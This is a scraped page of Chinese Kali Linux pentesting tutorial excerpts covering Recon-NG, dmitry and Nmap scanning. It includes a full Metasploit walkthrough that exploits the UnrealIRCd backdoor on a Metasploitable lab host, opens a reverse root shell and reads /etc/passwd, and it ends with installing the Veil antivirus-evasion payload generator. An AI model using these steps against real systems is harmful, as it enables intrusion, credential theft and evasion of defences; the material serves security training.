精华内容
下载资源
问答
  • kail linux渗透流程

    2018-06-03 14:09:10
    kail linux 渗透测试过程详细流程图,以xmind文件展示,支持自己修改
  • Kail Linux渗透测试教程之Recon-NG框架

    千次阅读 2015-08-28 14:16:30
    Kail Linux渗透测试教程之Recon-NG框架

    Kail Linux渗透测试教程之Recon-NG框架

    信息收集

    信息收集是网络攻击最重要的阶段之一。要想进行渗透攻击,就需要收集目标的各类信息。收集到的信息越多,攻击成功的概率也就越大。本章将介绍信息收集的相关工具。

    Recon-NG框架

    Recon-NG是由python编写的一个开源的Web侦查(信息收集)框架。Recon-ng框架是一个强大的工具,使用它可以自动的收集信息和网络侦查。下面将介绍使用Recon-NG侦查工具。

    启动Recon-NG框架,执行命令如下所示:

    • root@kali:~# recon-ng

    •                                                                                         

    •     _/_/_/    _/_/_/_/    _/_/_/    _/_/_/    _/      _/            _/      _/    _/_/_/

    •    _/    _/  _/        _/        _/      _/  _/_/    _/            _/_/    _/  _/      

    •   _/_/_/    _/_/_/    _/        _/      _/  _/  _/  _/  _/_/_/_/  _/  _/  _/  _/  _/_/_/

    •  _/    _/  _/        _/        _/      _/  _/    _/_/            _/    _/_/  _/      _/

    • _/    _/  _/_/_/_/    _/_/_/    _/_/_/    _/      _/            _/      _/    _/_/_/   

    •                                                                                        

    •      +---------------------------------------------------------------------------+     

    •      |  _                     ___    _                        __                 |     

    •      | |_)| _  _|_  |_|.|| _   |  _ |_ _  _ _  _ _|_o _  _   (_  _  _    _o_|_   |     

    •      | |_)|(_|(_|\  | ||||_\  _|_| || (_)| |||(_| | |(_)| |  __)(/_(_|_|| | | \/ |     

    •      |                                                                        /  |     

    •      |              Consulting | Research | Development | Training               |     

    •      |                     http://www.blackhillsinfosec.com                      |     

    •      +---------------------------------------------------------------------------+     

    •                       [recon-ng v4.1.4, Tim Tomes (@LaNMaSteR53)]                      

    • [56] Recon modules

    • [5]  Reporting modules

    • [2]  Exploitation modules

    • [2]  Discovery modules

    • [1]  Import modules

    • [recon-ng][default] >

    以上输出信息显示了Recon-NG框架的基本信息。例如在Recon-NG框架下,包括56个侦查模块、5个报告模块、2个渗透攻击模块、2个发现模块和1个导入模块。看到[recon-ng][default] >提示符,表示成功登录Recon-NG框架。现在,就可以在[recon-ng][default] >提示符后面执行各种操作命令了。

    首次使用Recon-NG框架之前,可以使用help命令查看所有可执行的命令。如下所示:

    • [recon-ng][default] > help

    • Commands (type [help|?] <topic>):

    • ---------------------------------

    • add             Adds records to the database

    • back            Exits current prompt level

    • del             Deletes records from the database

    • exit            Exits current prompt level

    • help            Displays this menu

    • keys            Manages framework API keys

    • load            Loads specified module

    • pdb             Starts a Python Debugger session

    • query           Queries the database

    • record          Records commands to a resource file

    • reload          Reloads all modules

    • resource        Executes commands from a resource file

    • search          Searches available modules

    • set             Sets module options

    • shell           Executes shell commands

    • show            Shows various framework items

    • spool           Spools output to a file

    • unset           Unsets module options

    • use             Loads specified module

    • workspaces      Manages workspaces

    以上输出信息显示了在Recon-NG框架中可运行的命令。该框架和Metasploit框架类似,同样也支持很多模块。此时,可以使用show modules命令查看所有有效的模块列表。执行命令如下所示:

    • [recon-ng][default] > show modules

    •   Discovery

    •   ---------

    •     discovery/info_disclosure/cache_snoop

    •     discovery/info_disclosure/interesting_files

    •   Exploitation

    •   ------------

    •     exploitation/injection/command_injector

    •     exploitation/injection/xpath_bruter

    •   Import

    •   ------

    •     import/csv_file

    •   Recon

    •   -----

    •     recon/companies-contacts/facebook

    •     recon/companies-contacts/jigsaw

    •     recon/companies-contacts/jigsaw/point_usage

    •     recon/companies-contacts/jigsaw/purchase_contact

    •     recon/companies-contacts/jigsaw/search_contacts

    •     recon/companies-contacts/linkedin_auth

    •     recon/contacts-contacts/mangle

    •     recon/contacts-contacts/namechk

    •     recon/contacts-contacts/rapportive

    •     recon/contacts-creds/haveibeenpwned

    • ……

    •     recon/hosts-hosts/bing_ip

    •     recon/hosts-hosts/ip_neighbor

    •     recon/hosts-hosts/ipinfodb

    •     recon/hosts-hosts/resolve

    •     recon/hosts-hosts/reverse_resolve

    •     recon/locations-locations/geocode

    •     recon/locations-locations/reverse_geocode

    •     recon/locations-pushpins/flickr

    •     recon/locations-pushpins/picasa

    •     recon/locations-pushpins/shodan

    •     recon/locations-pushpins/twitter

    •     recon/locations-pushpins/youtube

    •     recon/netblocks-hosts/reverse_resolve

    •     recon/netblocks-hosts/shodan_net

    •     recon/netblocks-ports/census_2012

    •   Reporting

    •   ---------

    •     reporting/csv

    •     reporting/html

    •     reporting/list

    •     reporting/pushpin

    •     reporting/xml

    •  [recon-ng][default] >

    从输出的信息中,可以看到显示了五部分。每部分包括的模块数,在启动Recon-NG框架后可以看到。用户可以使用不同的模块,进行各种的信息收集。

    【实例3-1】使用recon/domains-hosts/baidu_site模块,枚举baidu网站的子域。具体操作步骤如下所示:

    1)使用recon/domains-hosts/baidu_site模块。执行命令如下所示:

    • [recon-ng][default] > use recon/domains-hosts/baidu_site

    2)查看该模块下可配置选项参数。执行命令如下所示:

    • [recon-ng][default][baidu_site] > show options

    •   Name      Current Value       Req     Description

    •   --------------  ----------------------    ---------  --------------------------------------------------------

    •   SOURCE     default            yes      source of input (see 'show info' for details)

    • [recon-ng][default][baidu_site] >

    从输出的信息中,可以看到有一个选项需要配置。

    3)配置SOURCE选项参数。执行命令如下所示:

    • [recon-ng][default][baidu_site] > set SOURCE baidu.com

    • SOURCE => baidu.com

    从输出的信息中,可以看到SOURCE选项参数已经设置为baidu.com

    4)启动信息收集。执行命令如下所示:

    • [recon-ng][default][baidu_site] > run

    • ---------

    • BAIDU.COM

    • ---------

    • [*] URL: http://www.baidu.com/s?pn=0&wd=site%3Abaidu.com

    • [*] map.baidu.com

    • [*] 123.baidu.com

    • [*] jingyan.baidu.com

    • [*] top.baidu.com

    • [*] www.baidu.com

    • [*] hi.baidu.com

    • [*] video.baidu.com

    • [*] pan.baidu.com

    • [*] zhidao.baidu.com

    • [*] Sleeping to avoid lockout...

    • -------

    • SUMMARY

    • -------

    • [*] 9 total (2 new) items found.

    从输出的信息中,可以看到找到9个子域。枚举到的所有数据将被连接到Recon-NG放置的数据库中。这时候,用户可以创建一个报告查看被连接的数据。

    【实例3-2】查看获取的数据。具体操作步骤如下所示:

    1)选择reporting/csv模块,执行命令如下所示:

    • [recon-ng][default] > use reporting/csv

    2)创建报告。执行命令如下所示:

    • [recon-ng][default][csv] > run

    • [*] 9 records added to '/root/.recon-ng/workspaces/default/results.csv'.

    从输出的信息可以看到,枚举到的9个记录已被添加到/root/.recon-ng/workspaces/default/results.csv文件中。打开该文件,如图3.1所示。


    3.1  results.csv文件

    3)从该界面可以看到,枚举到的所有子域。

    用户也可以使用Dmitry命令,查询关于网站的信息。下面将介绍Dmitry命令的使用。

    查看Dmitry命令的帮助信息。执行命令如下所示:

    • root@kali:~# dmitry -h

    • Deepmagic Information Gathering Tool

    • "There be some deep magic going on"

    • dmitry: invalid option -- 'h'

    • Usage: dmitry [-winsepfb] [-t 0-9] [-o %host.txt] host

    •   -o  Save output to %host.txt or to file specified by -o file

    •   -i   Perform a whois lookup on the IP address of a host

    •   -w Perform a whois lookup on the domain name of a host

    •   -n  Retrieve Netcraft.com information on a host

    •   -s  Perform a search for possible subdomains

    •   -e  Perform a search for possible email addresses

    •   -p  Perform a TCP port scan on a host

    • * -f    Perform a TCP port scan on a host showing output reporting filtered ports

    • * -b   Read in the banner received from the scanned port

    • * -t 0-9 Set the TTL in seconds when scanning a TCP port ( Default 2 )

    • *Requires the -p flagged to be passed

    以上信息显示了dmitry命令的语法格式和所有可用参数。下面使用dmitry命令的-s选项,查询合理的子域。执行命令如下所示:

    • root@kali:~# dmitry -s google.com

    • Deepmagic Information Gathering Tool

    • "There be some deep magic going on"

    • HostIP:173.194.127.71

    • HostName:google.com

    • Gathered Subdomain information for google.com

    • ---------------------------------

    • Searching Google.com:80...

    • HostName:www.google.com

    • HostIP:173.194.127.51

    • Searching Altavista.com:80...

    • Found 1 possible subdomain(s) for host google.com, Searched 0 pages containing 0 results

    • All scans completed, exiting

    从输出的信息中,可以看到搜索到一个子域。该子域名为www.google.comIP地址为173.194.127.51。该命令默认是从google.com网站搜索,如果不能连接google.com网站的话,执行以上命令将会出现Unable to connect: Socket Connect Error错误信息。

    本文选自:Kail Linux渗透测试实训手册大学霸内部资料,转载请注明出处,尊重技术尊重IT人!


    展开全文
  • Kail Linux渗透测试教程之网络扫描和嗅探工具Nmap

    Kail Linux渗透测试教程之网络扫描和嗅探工具Nmap

    网络扫描和嗅探工具——Nmap

    Nmap也就网络映射器(Network Mapper),是一个免费开放的网络扫描和嗅探工具。该工具可以扫描主机是否在线、所开放的端口号、提供的网络服务及操作系统类型等。本节将介绍Nmap工具的使用。在使用Nmap工具之前,首先需要了解它的几种扫描类型。Nmap主要的扫描类型如表4-1所示。

    4-1  Nmap扫描类型


    【实例4-1】使用nmap工具扫描目标主机192.168.6.105的端口号。执行命令如下所示:

    • root@kali:~# nmap -sS -Pn 192.168.6.105

    • Starting Nmap 6.46 ( http://nmap.org ) at 2014-07-16 09:25 CST

    • Nmap scan report for 192.168.6.105

    • Host is up (0.00014s latency).

    • Not shown: 977 closed ports

    • PORT     STATE SERVICE

    • 21/tcp   open  ftp

    • 22/tcp   open  ssh

    • 23/tcp   open  telnet

    • 25/tcp   open  smtp

    • 53/tcp   open  domain

    • 80/tcp   open  http

    • 111/tcp  open  rpcbind

    • 139/tcp  open  netbios-ssn

    • 445/tcp  open  microsoft-ds

    • 512/tcp  open  exec

    • 513/tcp  open  login

    • 514/tcp  open  shell

    • 1099/tcp open  rmiregistry

    • 1524/tcp open  ingreslock

    • 2049/tcp open  nfs

    • 2121/tcp open  ccproxy-ftp

    • 3306/tcp open  mysql

    • 5432/tcp open  postgresql

    • 5900/tcp open  vnc

    • 6000/tcp open  X11

    • 6667/tcp open  irc

    • 8009/tcp open  ajp13

    • 8180/tcp open  unknown

    • MAC Address: 00:0C:29:13:E0:3D (VMware)

    • Nmap done: 1 IP address (1 host up) scanned in 0.48 seconds

    以上输出信息显示了,目标主机192.168.6.105上开放的所有端口号及目标主机的信息,如目标主机的MAC地址、扫描共用了0.48秒。在以上命令中,-sS选项表示使用TCP SYN扫描;-Pn选项表示不进行ping扫描。这里使用TCP SYN扫描,是因为这种方式扫描速度非常快,并且不容易被目标主机发现。

    如果用户想查看目标主机的所有启动服务及服务版本,可以指定Nmap工具的-A选项来实现。

    【实例4-2】扫描目标主机192.168.6.105上所有的端口号和服务版本。执行命令如下所示:

    • root@kali:~# nmap -sS -Pn -A 192.168.6.105

    • Starting Nmap 6.46 ( http://nmap.org ) at 2014-07-16 09:25 CST

    • Nmap scan report for 192.168.6.105

    • Host is up (0.00035s latency).

    • Not shown: 977 closed ports

    • PORT       STATE SERVICE    VERSION

    • 21/tcp              open  ftp           vsftpd 2.3.4

    • |_ftp-anon: Anonymous FTP login allowed (FTP code 230)

    • 22/tcp              open  ssh                  OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)

    • | ssh-hostkey:

    • |   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)

    • |_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)

    • 23/tcp                open  telnet         Linux telnetd

    • 25/tcp                open  smtp         Postfix smtpd

    • |_smtp-commands: metasploitable.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN,

    • | ssl-cert: Subject: commonName=ubuntu804-base.localdomain/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX

    • | Not valid before: 2010-03-17T14:07:45+00:00

    • |_Not valid after:  2010-04-16T14:07:45+00:00

    • |_ssl-date: 2014-07-09T06:59:06+00:00; -6d18h27m07s from local time.

    • 53/tcp               open  domain              ISC BIND 9.4.2

    • | dns-nsid:

    • |_  bind.version: 9.4.2

    • 80/tcp               open  http          Apache httpd 2.2.8 ((Ubuntu) DAV/2)

    • |_http-methods: No Allow or Public header in OPTIONS response (status code 200)

    • |_http-title: Metasploitable2 – Linux

    • ……

    • 6667/tcp           open  irc                    Unreal ircd

    • | irc-info:

    • |   server: irc.Metasploitable.LAN

    • |   version: Unreal3.2.8.1. irc.Metasploitable.LAN

    • |   servers: 1

    • |   users: 1

    • |   lservers: 0

    • |   lusers: 1

    • |   uptime: 0 days, 20:28:27

    • |   source host: 45DFBD5E.E9742FE6.FFFA6D49.IP

    • |_  source ident: nmap

    • 8009/tcp           open  ajp13                         Apache Jserv (Protocol v1.3)

    • |_ajp-methods: Failed to get a valid response for the OPTION request

    • 8180/tcp           open  http                   Apache Tomcat/Coyote JSP engine 1.1

    • |_http-favicon: Apache Tomcat

    • |_http-methods: No Allow or Public header in OPTIONS response (status code 200)

    • |_http-title: Apache Tomcat/5.5

    • MAC Address: 00:0C:29:13:E0:3D (VMware)

    • Device type: general purpose

    • Running: Linux 2.6.X

    • OS CPE: cpe:/o:linux:linux_kernel:2.6

    • OS details: Linux 2.6.9 - 2.6.33

    • Network Distance: 1 hop

    • Service Info: Hosts:  metasploitable.localdomain, localhost, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

    • Host script results:

    • |_nbstat: NetBIOS name: METASPLOITABLE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)

    • | smb-os-discovery:

    • |   OS: Unix (Samba 3.0.20-Debian)

    • |   NetBIOS computer name:

    • |   Workgroup: WORKGROUP

    • |_  System time: 2014-07-09T02:59:06-04:00

    • TRACEROUTE

    • HOP RTT     ADDRESS

    • 1   0.35 ms 192.168.6.105

    • OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .

    • Nmap done: 1 IP address (1 host up) scanned in 25.58 seconds

    从输出的信息中,可以看到目标主机上所启动的服务及服务软件版本。例如Unreal Internet Relay ChatIRC)服务,它的版本是3.8.1。用户可以通过获取到服务的版本,进行攻击主机。下面将会以例子的形式介绍通过服务版本,攻击主机的方法。

    【实例4-3】在MSF终端实现渗透攻击Unreal IRC服务。本例中选择使用Metasploit 2系统作为攻击目标,其地址为192.168.6.105。具体操作步骤如下所示:

    1)启动MSF终端。执行命令如下所示:

    • root@kali:~# msfconsole

    • msf>

    执行以上命令后,看到msf>提示符表示已成功登录MSF终端。

    2)查询Unreal 3.2.8.1可利用的模块。执行命令如下所示:

    • msf > search Unreal 3.2.8.1

    • Matching Modules

    • ================

    •    Name                                    Disclosure Date      Rank            Description

    •    ----                                        ---------------        ---------------     ---------------------------

    •    exploit/linux/games/ut2004_secure                  2004-06-18           good             Unreal Tournament 2004 "secure" Overflow (Linux)

    •    exploit/unix/irc/unreal_ircd_3281_backdoor        2010-06-12             excellent                   UnrealIRCD 3.2.8.1 Backdoor Command Execution

    •    exploit/windows/games/ut2004_secure         2004-06-18           good              Unreal Tournament 2004 "secure" Overflow (Win32)

    从输出的信息中,可以看到有三个可利用的模块。本例中选择使用unreal_ircd_3281_backdoor模块,该模块的级别非常好。

    3)查看unreal_ircd_3281_backdoor模块,可渗透攻击的详细信息。执行命令如下所示:

    • msf > info exploit/unix/irc/unreal_ircd_3281_backdoor

    •               Name:     UnrealIRCD 3.2.8.1 Backdoor Command Execution

    •               Module:   exploit/unix/irc/unreal_ircd_3281_backdoor

    •                  Platform:          Unix

    •  Privileged: No

    •                 License: Metasploit Framework License (BSD)

    •              Rank: Excellent

    • Provided by:

    •   hdm <hdm@metasploit.com>

    • Available targets:

    •   Id  Name

    •   --  ----

    •   0   Automatic Target

    • Basic options:

    •   Name   Current Setting  Required  Description

    •   ----   ---------------  --------  -----------

    •   RHOST                   yes       The target address

    •   RPORT  6667             yes       The target port

    • Payload information:

    •   Space: 1024

    • Description:

    •   This module exploits a malicious backdoor that was added to the

    •   Unreal IRCD 3.2.8.1 download archive. This backdoor was present in

    •   the Unreal3.2.8.1.tar.gz archive between November 2009 and June 12th

    •   2010.

    • References:

    •   http://cvedetails.com/cve/2010-2075/

    •   http://www.osvdb.org/65445

    •   http://www.unrealircd.com/txt/unrealsecadvisory.20100612.txt

    从输出的信息中,可以看到关于unreal_ircd_3281_backdoor模块的详细信息。其中,包括模块支持的平台、权限、提供商、基本选项设置及描述信息等。

    4)选择使用unreal_ircd_3281_backdoor模块,并查看该模块可配置的选项参数。执行命令如下所示:

    • msf > use exploit/unix/irc/unreal_ircd_3281_backdoor

    • msf exploit(unreal_ircd_3281_backdoor) > show options

    • Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):

    •    Name   Current Setting  Required  Description

    •    ----   ---------------  --------  -----------

    •    RHOST                   yes       The target address

    •    RPORT  6667             yes       The target port

    • Exploit target:

    •    Id  Name

    •    --  ----

    •    0   Automatic Target

    从输出信息中,可以看到有两个必须配置的选项参数。其中RPORT选项已经配置,接下来还需要配置RHOST选项。

    5)配置RHOST选项参数。执行命令如下所示:

    • msf exploit(unreal_ircd_3281_backdoor) > set RHOST 192.168.6.105

    • RHOST => 192.168.6.105

    从输出信息中,可以看到使用目标主机的地址为192.168.6.105

    6)查看所有可利用的攻击载荷。执行命令如下所示:

    • msf exploit(unreal_ircd_3281_backdoor) > show payloads

    • Compatible Payloads

    • ===================

    •    Name                         Disclosure Date   Rank    Description

    •    ------------------------------------      ------------------------ ------------- -----------------

    •    cmd/unix/bind_perl                                                           normal  Unix Command Shell, Bind TCP (via Perl)

    •    cmd/unix/bind_perl_ipv6                                                      normal  Unix Command Shell, Bind TCP (via perl) IPv6

    •    cmd/unix/bind_ruby                                                normal  Unix Command Shell, Bind TCP (via Ruby)

    •    cmd/unix/bind_ruby_ipv6                                             normal  Unix Command Shell, Bind TCP (via Ruby) IPv6

    •    cmd/unix/generic                                                     normal  Unix Command, Generic Command Execution

    •    cmd/unix/reverse                                                             normal  Unix Command Shell, Double Reverse TCP (telnet)

    •    cmd/unix/reverse_perl                                                normal  Unix Command Shell, Reverse TCP (via Perl)

    •    cmd/unix/reverse_perl_ssl                                                    normal  Unix Command Shell, Reverse TCP SSL (via perl)

    •    cmd/unix/reverse_ruby                                                       normal  Unix Command Shell, Reverse TCP (via Ruby)

    •    cmd/unix/reverse_ruby_ssl                                          normal  Unix Command Shell, Reverse TCP SSL (via Ruby)

    •    cmd/unix/reverse_ssl_double_telnet                                      normal  Unix Command Shell, Double Reverse TCP SSL (telnet)

    输出的信息显示了,在unreal_ircd_3281_backdoor模块中可加载的攻击载荷。从输出模块的描述信息,可以看到这些攻击载荷都是命令行Shell。这样就不能进入Meterpreter shell了,而且现在只能使用反Shell。当成功攻击目标主机后,在终端Shell的权限也会降低。

    7)使用反Shell,攻击目标主机。选择加载reverse攻击载荷,并查看该载荷下可配置的选项参数。执行命令如下所示:

    • msf exploit(unreal_ircd_3281_backdoor) > set payload cmd/unix/reverse

    • payload => cmd/unix/reverse

    • msf exploit(unreal_ircd_3281_backdoor) > show options

    • Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):

    •    Name   Current Setting  Required  Description

    •    ----   ---------------  --------  -----------

    •    RHOST  192.168.6.105    yes       The target address

    •    RPORT  6667             yes       The target port

    • Payload options (cmd/unix/reverse):

    •    Name   Current Setting  Required  Description

    •    ----   ---------------  --------  -----------

    •    LHOST                   yes       The listen address

    •    LPORT  4444             yes       The listen port

    • Exploit target:

    •    Id  Name

    •    --  ----

    •    0   Automatic Target

    从输出的结果中,可以看到LHOST选项参数未配置。

    8)配置LHOST选项参数。执行命令如下所示:

    • msf exploit(unreal_ircd_3281_backdoor) > set LHOST 192.168.6.103

    • LHOST => 192.168.6.103

    执行以上命令后,再次查看所有选项参数的配置情况。执行命令如下所示:

    • msf exploit(unreal_ircd_3281_backdoor) > show options

    • Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):

    •    Name   Current Setting  Required  Description

    •    ----   ---------------  --------  -----------

    •    RHOST  192.168.6.105    yes       The target address

    •    RPORT  6667             yes       The target port

    • Payload options (cmd/unix/reverse):

    •    Name   Current Setting  Required  Description

    •    ----   ---------------  --------  -----------

    •    LHOST  192.168.6.103    yes       The listen address

    •    LPORT  4444             yes       The listen port

    • Exploit target:

    •    Id  Name

    •    --  ----

    •    0   Automatic Target

    从输出的信息中,可以看到所有选项都以配置。接下来就可以进行攻击了。

    9)启动渗透攻击。执行命令如下所示:

    • msf exploit(unreal_ircd_3281_backdoor) > exploit

    •  [*] Started reverse double handler

    • [*] Connected to 192.168.6.105:6667...

    •     :irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...

    • [*] Sending backdoor command...

    • [*] Accepted the first client connection...

    • [*] Accepted the second client connection...

    • [*] Command: echo 4G58mrIzlfNG2zIm;

    • [*] Writing to socket A

    • [*] Writing to socket B

    • [*] Reading from sockets...

    • [*] Reading from socket B

    • [*] B: "4G58mrIzlfNG2zIm\r\n"

    • [*] Matching...

    • [*] A is input...

    • [*] Command shell session 1 opened (192.168.6.103:4444 -> 192.168.6.105:53656) at 2014-07-16 09:34:05 +0800

    从输出的信息中,可以看到成功打开了一个会话。但是没有进入任何Shell的提示符,只有一个闪烁的光标。这表示连接到目标主机的一个终端Shell,此时可以执行任何标准的Linux命令。例如,查看目标系统当前登录的用户名,执行命令如下所示:

    • whoami

    执行以上命令后,将显示如下所示的信息:

    • root

    从输出的信息可以看到当前登录的用户是超级用户root

    如想查看目标系统的密码文件,执行命令如下所示:

    • cat /etc/passwd

    • root:x:0:0:root:/root:/bin/bash

    • daemon:x:1:1:daemon:/usr/sbin:/bin/sh

    • bin:x:2:2:bin:/bin:/bin/sh

    • sys:x:3:3:sys:/dev:/bin/sh

    • sync:x:4:65534:sync:/bin:/bin/sync

    • games:x:5:60:games:/usr/games:/bin/sh

    • man:x:6:12:man:/var/cache/man:/bin/sh

    • lp:x:7:7:lp:/var/spool/lpd:/bin/sh

    • mail:x:8:8:mail:/var/mail:/bin/sh

    • news:x:9:9:news:/var/spool/news:/bin/sh

    • uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh

    • proxy:x:13:13:proxy:/bin:/bin/sh

    • www-data:x:33:33:www-data:/var/www:/bin/sh

    • backup:x:34:34:backup:/var/backups:/bin/sh

    • list:x:38:38:Mailing List Manager:/var/list:/bin/sh

    • irc:x:39:39:ircd:/var/run/ircd:/bin/sh

    • gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh

    • nobody:x:65534:65534:nobody:/nonexistent:/bin/sh

    • libuuid:x:100:101::/var/lib/libuuid:/bin/sh

    • dhcp:x:101:102::/nonexistent:/bin/false

    • syslog:x:102:103::/home/syslog:/bin/false

    • klog:x:103:104::/home/klog:/bin/false

    • sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin

    • msfadmin:x:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash

    • bind:x:105:113::/var/cache/bind:/bin/false

    • postfix:x:106:115::/var/spool/postfix:/bin/false

    • ftp:x:107:65534::/home/ftp:/bin/false

    • postgres:x:108:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash

    • mysql:x:109:118:MySQL Server,,,:/var/lib/mysql:/bin/false

    • tomcat55:x:110:65534::/usr/share/tomcat5.5:/bin/false

    • distccd:x:111:65534::/:/bin/false

    • user:x:1001:1001:just a user,111,,:/home/user:/bin/bash

    • service:x:1002:1002:,,,:/home/service:/bin/bash

    • telnetd:x:112:120::/nonexistent:/bin/false

    • proftpd:x:113:65534::/var/run/proftpd:/bin/false

    • statd:x:114:65534::/var/lib/nfs:/bin/false

    • snmp:x:115:65534::/var/lib/snmp:/bin/false

    输出信息显示了,目标系统中所有的用户信息。用户可以根据这些信息攻击目标主机上用户的密码。

    本文选自:Kail Linux渗透测试实训手册大学霸内部资料,转载请注明出处,尊重技术尊重IT人!

    展开全文
  • Kail Linux渗透测试教程之免杀Payload生成工具Veil

    Kail Linux渗透测试教程之免杀Payload生成工具Veil

    免杀Payload生成工具——Veil

    Kail Linux渗透测试教程之免杀Payload生成工具VeilVeil是一款利用Metasploit框架生成相兼容的Payload工具,并且在大多数网络环境中能绕过常见的杀毒软件。本节将介绍Veil工具的安装及使用。

    Kali Linux中,默认没有安装Veil工具。这里首先安装Veil工具,执行如下所示的命令:

    • root@kali:~# apt-get update && apt-get install veil

    执行以上命令后,如果安装过程没有提示错误的话,则表示Veil工具安装成功。由于安装该工具依赖的软件较多,所以此过程时间有点长。

    启动Veil工具。执行命令如下所示:

    • root@kali:~# veil-evasion

    执行以上命令后,将会输出大量的信息。如下所示:

    • =========================================================================

    •  Veil First Run Detected... Initializing Script Setup...

    • =========================================================================

    • [*] Executing ./setup/setup.sh

    • =========================================================================

    •  Veil-Evasion Setup Script | [Updated]: 01.15.2015

    • =========================================================================

    •  [Web]: https://www.veil-framework.com | [Twitter]: @VeilFramework

    • =========================================================================

    • [*] Initializing Apt Dependencies Installation

    • [*] Adding i386 Architecture To x86_64 System

    • [*] Updating Apt Package Lists

    • 命中 http://mirrors.ustc.edu.cn kali Release.gpg

    • 命中 http://mirrors.ustc.edu.cn kali/updates Release.gpg                      

    • 命中 http://mirrors.ustc.edu.cn kali Release                                  

    • 命中 http://mirrors.ustc.edu.cn kali/updates Release                          

    • 命中 http://mirrors.ustc.edu.cn kali/main Sources                             

    • 命中 http://mirrors.ustc.edu.cn kali/non-free Sources            

    • 命中 http://mirrors.ustc.edu.cn kali/contrib Sources             

    • 命中 http://mirrors.ustc.edu.cn kali/main amd64 Packages         

    • 命中 http://mirrors.ustc.edu.cn kali/non-free amd64 Packages

    • 命中 http://mirrors.ustc.edu.cn kali/contrib amd64 Packages      

    • 获取:1 http://mirrors.ustc.edu.cn kali/main i386 Packages [8,474 kB]

    • 命中 http://http.kali.org kali Release.gpg                              

    • 命中 http://security.kali.org kali/updates Release.gpg              

    • 命中 http://http.kali.org kali Release                    

    • ……

    • 忽略 http://http.kali.org kali/non-free Translation-en

    • 下载 17.8 MB,耗时 20 (859 kB/s)

    • 正在读取软件包列表... 完成

    •  [*] Installing Wine i386 Binaries

    • 正在读取软件包列表... 完成

    • 正在分析软件包的依赖关系树      

    • 正在读取状态信息... 完成      

    • 将会安装下列额外的软件包:

    •   gcc-4.7-base:i386 libasound2:i386 libc-bin libc-dev-bin libc6 libc6:i386

    •   libc6-dev libc6-i686:i386 libdbus-1-3:i386 libdrm-intel1:i386

    •   libdrm-nouveau1a:i386 libdrm-radeon1:i386 libdrm2:i386 libexpat1:i386

    •   libffi5:i386 libfontconfig1:i386 libfreetype6:i386 libgcc1:i386

    • [*] Cleaning Up Setup Files

    • [*] Updating Veil-Framework Configuration

    •  Veil-Framework configuration:

    •  [*] OPERATING_SYSTEM = Kali

    •  [*] TERMINAL_CLEAR = clear

    •  [*] TEMP_DIR = /tmp/

    •  [*] MSFVENOM_OPTIONS =

    •  [*] METASPLOIT_PATH = /usr/share/metasploit-framework/

    •  [*] PYINSTALLER_PATH = /usr/share/pyinstaller/

    • [*] VEIL_EVASION_PATH = /usr/share/veil-evasion/

    •  [*] PAYLOAD_SOURCE_PATH = /root/veil-output/source/

    •  [*] Path '/root/veil-output/source/' Created

    •  [*] PAYLOAD_COMPILED_PATH = /root/veil-output/compiled/

    •  [*] Path '/root/veil-output/compiled/' Created

    •  [*] Path '/root/veil-output/handlers/' Created

    •  [*] GENERATE_HANDLER_SCRIPT = True

    •  [*] HANDLER_PATH = /root/veil-output/handlers/

    •  [*] HASH_LIST = /root/veil-output/hashes.txt

    • [*] VEIL_CATAPULT_PATH = /usr/share/Veil-Catapult/

    •  [*] Path '/root/veil-output/catapult/' Created

    •  [*] CATAPULT_RESOURCE_PATH = /root/veil-output/catapult/

    • [*] Path '/etc/veil/' Created

    •  Configuration File Written To '/etc/veil/settings.py'

    以上信息只有在第一次运行Veil时,才显示。在此过程中,初始化一些脚本、软件包列表、更新配置及安装需要的软件包。在此过程中以图形界面的形式依次安装了Python及它的两个模块pywin32-218pycrypto-2.6。下面依次进行安装。首先弹出的对话框,如图4.1所示。

    该界面是安装Python的初始界面。这里使用默认设置,单击Next按钮,将显示如图4.2所示的界面。


    ​  4.1  Python初始界面                               4.2  选择Python安装位置

    在该界面单击Next按钮,将显示如图4.3所示的界面。该界面提示C:\Python27已存在,确认是否要覆盖已存在的文件。这里单击yes按钮,将显示如图4.4所示的界面。  


    4.3  确认Python的安装位置          4.4  自定义Python

    在该界面自定义安装Python的一些功能。这里使用默认的设置,单击Next按钮,将显示如图4.5所示的界面     


    4.5  安装完成       4.6  安装pywin32-218模块界面 

    该界面提示Python已经安装完成。此时单击Finish按钮,将显示如图4.6所示的界面。

    该界面是要求安装pywin32-218模块。这里单击“下一步”按钮,将显示如图4.7所示的界面。


    4.7  设置向导        4.8  准备安装

    这里使用默认设置,单击“下一步”按钮,将显示如图4.8所示的界面。

    该界面用来确实是否要开始安装。如果确认配置正确的话,单击“下一步”按钮,将显示如图4.9所示的界面。


    4.9  安装完成                  4.10  安装pycrypto-2.6模块初始界面 

    从该界面可以看到pywin32-218模块已经安装完成。此时单击“结束”按钮,将显示如图4.10所示的界面。

    该界面提示需要安装pycrypto-2.6模块。这里单击“下一步”按钮开始安装,如图4.11所示。 


    4.11  设置向导      4.12  准备安装 

    这里使用默认设置,单击“下一步”按钮,将显示如图4.12所示的界面。

    该界面提示将要安装pycrypto模块。这里单击“下一步”按钮,将显示如图4.13所示的界面。


    4.13  安装完成

    • 从该界面可以看到以上软件包已安装完成。此时单击“结束”按钮,将显示如下所示的信息:

    • =========================================================================

    •  Veil-Evasion | [Version]: 2.4.3

    • =========================================================================

    •  [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework

